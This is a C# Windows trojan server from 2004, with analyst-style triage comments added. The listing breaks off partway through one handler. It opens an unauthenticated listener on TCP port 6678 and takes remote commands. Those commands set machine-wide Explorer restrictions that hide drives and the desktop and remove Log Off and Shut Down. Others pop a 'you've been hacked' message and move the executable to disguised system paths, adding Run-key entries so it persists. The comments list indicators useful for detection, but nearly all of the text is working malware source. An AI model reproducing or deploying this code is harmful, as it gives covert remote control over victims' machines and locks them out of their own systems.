特洛伊木马服务器
//wgscd 2004-12 qq:153964481
using system;
using system.drawing;
using system.collections;
using system.componentmodel;
using system.windows.forms;
using system.data;
using system.io;
using system.net;
using system.net.sockets;
using system.threading;
using microsoft.win32;
namespace server
{
/// <summary>
/// form1 的摘要说明。
/// </summary>
public class form1 : system.windows.forms.form
{
/// <summary>
/// Required designer variable.
/// </summary>
private system.componentmodel.container components = null;
// Listening socket created in the constructor; target() takes its one connection from it.
private tcplistener listener;
// Text shown by the "jy0000" command. The "zx" handlers (and two "zs" handlers) append
// the registry path and the names of the values they changed, so the string grows for
// as long as the process lives.
private string mystr="您好!非常抱歉,您的注册表:";
// Root hive for every registry operation in this class: HKEY_LOCAL_MACHINE, i.e.
// machine-wide settings rather than per-user ones.
private registrykey rrr=registry.localmachine;
// Shared handle reused by all command handlers. NOTE(review): it is assigned by
// opensubkey() and never reset to null in the code shown, which decides whether the
// createsubkey() fallbacks in target() can run.
private registrykey key1;
// Builds the form and, as a side effect of construction, opens the control channel:
// a TCP listener on port 6678 plus a worker thread running target().
// Triage notes: a process with a listening socket on TCP 6678 is the network
// artefact of this sample. The single-argument tcplistener constructor does not name
// a local address, so the listener is not restricted to loopback.
// NOTE(review): the thread is never marked as a background thread in the code shown,
// so the process presumably keeps running after the window is closed - confirm.
public form1()
{
//
// Required for Windows Forms designer support
//
initializecomponent();
{int port =6678;
listener=new tcplistener(port);
listener.start();
thread thread=new thread(new threadstart(target));
thread.start();
}
//
// todo: add any constructor code after the initializecomponent call
//
}
// Command loop for the one controller connection this process accepts.
//
// What the visible code does:
//  - acceptsocket() is called once, outside the loop, so a single peer is served;
//  - while the socket reports connected, up to 6 bytes are read and the ASCII text is
//    compared with fixed 6-character commands. There is no authentication step: any
//    peer that can reach the listener is treated as the controller;
//  - the byte count returned by receive() (i) is never looked at;
//  - "jiance" is answered with "hjc"; every other recognised command is answered with
//    "hkz", and that reply is sent whether or not the action worked, because failures
//    are swallowed by empty catch blocks.
//
// Command families (the four digits select nologoff, noclose, nodrives, nodesktop,
// in that order):
//  zx????  sets the selected Explorer policy values (1, or 12 for nodrives)
//  zs????  sets the selected values back to 0
//  jg0000  shows a fixed message box;  jy0000 shows the accumulated mystr text
//  mw????  moves the executable and rewrites its Run value
//  xz0000  deletes the Run values (the files themselves are not removed here)
//
// Artefacts for triage, spelled as on this page (the listing is lowercased, so real
// casing may differ):
//  - HKLM\software\microsoft\windows\currentversion\policies\explorer values
//    nologoff, noclose, nodrives, nodesktop. These are the Explorer restriction
//    policies (Log Off / Shut Down removed from the Start menu, drives hidden, desktop
//    hidden); nodrives is a drive-letter bitmask and 12 corresponds to C: and D:;
//  - HKLM\software\microsoft\windows\currentversion\run values expleror, msdoss,
//    microsoftt;
//  - files c:\winnt\system\expleror.exe, c:\winnt\system32\msdoss.exe,
//    d:\winnt\system32\microsoftt.exe.
// Cleanup therefore has to cover the Run values, the files and the policy values;
// the "xz0000" handler below only covers the first of these.
//
// NOTE(review): key1 is a field and is never reset to null in the code shown. Once
// any opensubkey() call has returned a key, every later "if(key1==null)" fallback is
// skipped, even when the current open failed.
public void target()
{
socket socket= listener.acceptsocket();
while(socket.connected)
{
byte[] by=new byte[6];
int i=socket.receive(by,by.length,0);
string ss=system.text.encoding.ascii.getstring(by);
//ooooooooooooooooooooooooooo registry modification section starts below ooooooooooooooooooooooooooo
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
// "jiance" is the liveness probe: it changes nothing and answers "hjc".
if(ss=="jiance")
{
string str="hjc";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
if(ss=="zx1000")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff被修改!请将它置为0!";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff被修改!请将它置为0!";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if(ss=="")
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
//****************************************************************************
if(ss=="zx0100")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",1);
key1.close();
mystr=mystr+"localmachine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose被修改!请将它置为0!";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",1);
key2.close();
mystr=mystr+"localmachine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose被修改!请将它置为0!";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if(ss=="zx0100"){
//****************************************************************************
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
if(ss=="zx0010")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",12);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",12);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//====================================================================
if(ss=="zx0001")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//=========================================================================
//$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
if(ss=="zx1100")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("noclose",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("noclose",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="zx1010")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("nodrives",12);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("nodrives",12);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//**************************************************
if(ss=="zx1001")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodesktop被修改!请将它置为0";
}
// The only handler that surfaces a failure: the exception text is shown in a message
// box on the machine running this program instead of being swallowed.
catch(exception ee){messagebox.show(ee.message);}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zx0110")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",1);
key1.setvalue("nodrives",12);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",1);
key2.setvalue("nodrives",12);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zx0101")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",1);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",1);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************
if(ss=="zx0011")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",12);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodrives、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",12);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nodrives、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//************************************
if(ss=="zx1110")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("noclose",1);
key1.setvalue("nodrives",12);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("noclose",1);
key2.setvalue("nodrives",12);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodrives被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//**************************************
if(ss=="zx1101")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("noclose",1);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("noclose",1);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//******************************************
if(ss=="zx1011")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("nodrives",12);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodrives、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("nodrives",12);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、nodrives、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zx0111")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",12);
key1.setvalue("noclose",1);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodrives、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",12);
key2.setvalue("noclose",1);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodrives、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zx1111")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",1);
key1.setvalue("noclose",1);
key1.setvalue("nodrives",12);
key1.setvalue("nodesktop",1);
key1.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodrives、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",1);
key2.setvalue("noclose",1);
key2.setvalue("nodrives",12);
key2.setvalue("nodesktop",1);
key2.close();
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodrives、nodesktop被修改!请将它置为0";
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//*********************************************
//ooooooooooooooooooooooooooo end of the registry modification section oooooooooooooooooooooooooooooooo
//pppppppppppppppppppppppppppp benign (restore) modification section starts below ppppppppppppppppppppppppppppp
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
// The "zs" handlers mirror the "zx" handlers with the value 0. They write 0 rather
// than deleting the values, so the four value names remain under the policies key.
if(ss=="zs1000")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if(ss=="")
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
//***********************************************************************
if(ss=="zs0100")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if(ss=="zx0100"){
//********************************************************************
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
if(ss=="zs0010")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//==================================================================
if(ss=="zs0001")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//=========================================================================
if(ss=="zs1100")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("noclose",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("noclose",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="zs1010")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("nodrives",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("nodrives",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//**************************************************
if(ss=="zs1001")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zs0110")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",0);
key1.setvalue("nodrives",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",0);
key2.setvalue("nodrives",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zs0101")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("noclose",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("noclose",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************
if(ss=="zs0011")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//************************************
if(ss=="zs1110")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("noclose",0);
key1.setvalue("nodrives",0);
key1.close();
// Unlike most other "zs" handlers, this one still appends the "was modified" text to
// mystr, so the "jy0000" message can list values that were just set back to 0.
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值nologoff、noclose、nodrives被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("noclose",0);
key2.setvalue("nodrives",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//**************************************
if(ss=="zs1101")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("noclose",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("noclose",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//******************************************
if(ss=="zs1011")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("nodrives",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("nodrives",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zs0111")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nodrives",0);
key1.setvalue("noclose",0);
key1.setvalue("nodesktop",0);
key1.close();
// Same leftover as in "zs1110": the restore path still appends the "was modified" text.
mystr=mystr+"hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer键值noclose、nodrives、nodesktop被修改!请将它置为0";
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nodrives",0);
key2.setvalue("noclose",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//********************************************
if(ss=="zs1111")
{
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer",true);
key1.setvalue("nologoff",0);
key1.setvalue("noclose",0);
key1.setvalue("nodrives",0);
key1.setvalue("nodesktop",0);
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\policies\\explorer");
key2.setvalue("nologoff",0);
key2.setvalue("noclose",0);
key2.setvalue("nodrives",0);
key2.setvalue("nodesktop",0);
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}//if
//pppppppppppppppppppppppppppp end of the benign (restore) modification section pppppppppppppppppppppppppp
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> warning section starts below >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
// messagebox.show is called on the command thread, so the "hkz" reply below is not
// sent until the dialog has been dismissed.
if(ss=="jg0000")
{
messagebox.show("你被我黑了!");
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> end of the warning section >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& advice section starts below &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="jy0000")
{
messagebox.show(mystr);
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& end of the advice section &&&&&&&&&&&&&&&&&&&&&&&&&&&
//################################## trojan relocation section starts below ###################
//||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
// Each "mw" handler moves the executable to another hard-coded path and then writes a
// Run value for the new path. The Run value belonging to the previous location is not
// deleted here, so a host can carry more than one of the three value names at once.
if(ss=="mw1000")
{
try{ file.move("c:\\winnt\\system\\expleror.exe","c:\\winnt\\system32\\msdoss.exe");}
catch{}
try
{
key1=rrr.opensubkey("software\\microsoft\\windows\\currentversion\\run",true);
key1.setvalue("msdoss","c:\\winnt\\system32\\msdoss.exe");
key1.close();
}
catch{}
if(key1==null)
{
try
{
registrykey key2=rrr.createsubkey("software\\microsoft\\windows\\currentversion\\run");
key2.setvalue("msdoss","c:\\winnt\\system32\\msdoss.exe");
key2.close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=system.text.encoding.ascii.getbytes(str.tochararray());
socket.send(bytee,bytee.length,0);
}
//|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
//_____________________________________________________________________
if(ss=="mw0100")
{
try{file.move("c:\\winnt\\system\\expleror.exe","d:\\winnt\\system32\\microsoftt.exe");}
catch{}
try
{
